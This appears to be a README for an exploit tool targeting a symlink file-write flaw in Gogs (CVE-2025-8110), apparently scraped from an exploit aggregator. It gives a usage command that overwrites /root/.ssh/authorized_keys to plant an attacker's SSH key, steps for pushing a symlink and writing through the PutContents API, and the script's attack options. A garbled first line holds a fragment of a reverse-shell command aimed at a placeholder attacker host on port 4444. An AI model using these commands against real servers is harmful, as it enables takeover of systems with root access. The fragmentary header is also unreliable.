## https://sploitus.com/exploit?id=3D2F9AEA-3487-501E-9C67-A36F90FA5377
# CVE-2025-8110 โ Gogs & /dev/tcp/ATTACKER/4444 0>&1"'
# Cleanup the exploit repo after use
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
--target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub --cleanup
```
## How It Works
1. **Authenticate** โ Log in (or self-register) and create an API token.
2. **Create a repo** โ Initialize a new repository with a README via the web UI.
3. **Push a symlink** โ Clone the repo locally, create a symlink pointing to the target file (e.g. `/root/.ssh/authorized_keys`), commit, and push.
4. **Write through the symlink** โ Call the PutContents API on the symlink filename. Gogs resolves the symlink on disk and writes attacker content to the real file as the Gogs process user (often `root`).
## Options
```
--url Gogs base URL (e.g. http://target:3001)
-u, --user Gogs username
-p, --password Gogs password
--register Self-register a throwaway account (no captcha)
--target-file Absolute path to overwrite on the server
--content String content to write
--content-file Local file whose contents to write
--repo Repo name to create (default: random)
--link-name Symlink filename in the repo (default: payload)
--cleanup Delete the exploit repo after writing
```
## Disclaimer
This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Use responsibly.